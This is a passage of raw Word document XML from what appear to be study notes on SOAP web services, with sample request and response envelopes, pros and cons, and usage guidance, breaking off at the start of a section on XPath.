          <w:ilvl w:val="0"/>
          <w:numId w:val="1790"/>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Client Request</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>A client sends an XML request to a SOAP web service. This request includes the SOAP envelope, which contains the SOAP header (optional) and body (required with the request payload).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7442F908" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1790"/>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ervice Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>The server processes the SOAP request. It extracts the necessary data from the SOAP body, performs the required operations (business logic), and prepares a response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48589DC5" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1790"/>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erver Response</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>The server sends an XML response back to the client within a SOAP envelope. The response contains the SOAP body with the output data (results, status, etc.) in XML format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA95DC5" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1790"/>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Client Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>The client processes the response (also in XML format) and performs any further actions or displays results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7F01D2" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00000000" w:rsidP="0058596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BA8F3AB">
          <v:rect id="_x0000_i1971" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0975920F" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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SOAP Web Service Message Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7108D6" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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Here’s an example of a SOAP request and response message:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516CED35" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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SOAP Request (XML format):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD4E0A5" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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t;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BB0457" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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t;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A254C0" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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xmlns:web="http://www.example.com/webservice"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769A06BD" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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soapenv:Header/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E017B52" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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soapenv:Body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E4B99A" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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web:GetEmployeeDetails&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B1275C" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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web:employeeId&gt;123&lt;/web:employeeId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553FA2CD" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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web:GetEmployeeDetails&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05557D06" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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soapenv:Body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAA0DE5" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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t;/soapenv:Envelope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E3E54F" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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SOAP Response (XML format):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E0B662" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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lastRenderedPageBreak/>
        <w:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C1874C" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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t;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08704335" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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xmlns:web="http://www.example.com/webservice"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CEFE80" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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soapenv:Header/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010661D3" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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soapenv:Body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE38FA6" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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web:GetEmployeeDetailsResponse&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710AD5C1" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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web:employeeName&gt;John Doe&lt;/web:employeeName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B73BA2" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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web:employeeRole&gt;Software Developer&lt;/web:employeeRole&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B778CB1" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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web:employeeSalary&gt;70000&lt;/web:employeeSalary&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145D5026" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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web:GetEmployeeDetailsResponse&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD88038" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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soapenv:Body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBBC9F2" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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t;/soapenv:Envelope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453F2E71" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00000000" w:rsidP="0058596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B98CF91">
          <v:rect id="_x0000_i1972" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E5839D" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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Advantages of SOAP Web Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F6DA5A" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1791"/>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Platform-Independent</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>SOAP web services work across various platforms and programming languages, making them interoperable. SOAP messages are in XML format, which is platform-agnostic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37239101" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1791"/>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ecurity</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>SOAP supports WS-Security, which provides a higher level of security for web services, such as encryption, authentication, and message integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7E92D3" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1791"/>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Reliability</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>SOAP supports WS-ReliableMessaging, ensuring that messages are delivered reliably even in the case of network failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D3A317" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1791"/>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tandardized Protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>SOAP is highly standardized and formalized, ensuring consistency and compatibility across different systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16245531" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1791"/>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Extensibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>SOAP can support additional features (e.g., security, transactions, etc.) through extensions like WS-Security, WS-AtomicTransaction, and WS-ReliableMessaging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE4F63F" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00000000" w:rsidP="0058596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05FF5D2">
          <v:rect id="_x0000_i1973" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC78045" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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Disadvantages of SOAP Web Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C907F14" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1792"/>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Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>SOAP is more complex to implement compared to REST due to its reliance on XML, WSDL, and additional standards (such as WS-Security).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E67FBF5" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1792"/>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Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>SOAP messages are typically larger than REST messages (especially when using XML), leading to higher overhead and slower performance, particularly in scenarios where the payload is small.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6639A9BD" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1792"/>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Limited Flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>SOAP uses XML exclusively for communication and is not as flexible as REST, which supports multiple formats (e.g., JSON, XML, plain text).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D31994B" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00000000" w:rsidP="0058596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C6654C6">
          <v:rect id="_x0000_i1974" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D29FBA" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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When to Use SOAP Web Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65464F00" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1793"/>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Enterprise-level applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you need robust security, reliability, and transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5551A830" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1793"/>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Legacy systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: SOAP is often used in older enterprise systems and in applications requiring strict data integrity and security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AE2D94" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1793"/>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Critical Services</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you require features like ACID transactions or asynchronous messaging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D174F13" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00000000" w:rsidP="0058596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CCF27D1">
          <v:rect id="_x0000_i1975" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52414A3E" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCA0B29" w14:textId="77777777" w:rsidR="00521B22" w:rsidRPr="00585961" w:rsidRDefault="00521B22"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SOAP Web Services are highly structured, secure, and reliable, making them suitable for applications that require formal contracts, security, and reliability (such as banking and financial services). However, the complexity and performance overhead make REST a more suitable choice for most web-based applications and modern APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AD22DA" w14:textId="7596D5C1" w:rsidR="004F5B43" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004F5B4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BE970BC">
          <v:rect id="_x0000_i1976" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="185C011D" w14:textId="09447E7F" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="00287771">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="402" w:name="_Toc196307882"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Path in XML</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="402"/>
    </w:p>
    <w:p w14:paraId="0D17B403" w14:textId="0D384AAE" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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In XML, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>path</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> refers to a way to navigate or locate specific elements or attributes within an XML document. It allows you to specify the exact location of data or content within the document's hierarchy. The most </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">commonly used method for defining paths in XML is </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (XML Path Language), which provides a syntax for selecting nodes in an XML document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6161811F" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7"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Key Points about Path in XML:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A37EA4" w14:textId="77777777" w:rsidR="004D65E7" w:rsidRPr="00585961" w:rsidRDefault="004D65E7" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1794"/>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XPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">XPath is a query language used for navigating an XML document and selecting nodes based on a specific path. An </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>XPath expression</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
